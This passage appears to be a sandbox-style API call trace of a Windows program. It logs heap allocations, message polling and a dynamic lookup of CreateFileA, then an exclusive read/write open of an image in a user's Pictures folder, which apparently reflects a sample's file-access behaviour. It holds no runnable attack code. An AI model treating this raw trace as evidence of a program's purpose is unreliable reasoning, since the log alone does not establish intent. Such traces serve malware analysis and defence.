dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.305] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.305] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.306] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.306] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.309] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.311] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8896a0 [0041.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8896a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.312] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0041.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8896a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.312] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0041.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x39) returned 0x7ab260 [0041.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", cchWideChar=57, lpMultiByteStr=0x7ab260, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpUsedDefaultChar=0x0) returned 57 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.313] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\phhv1rvp we r.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0041.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72) returned 0x7800d0 [0041.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=57, lpWideCharStr=0x7800d0, cchWideChar=57 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif") returned 57 [0041.314] HeapFree (in: 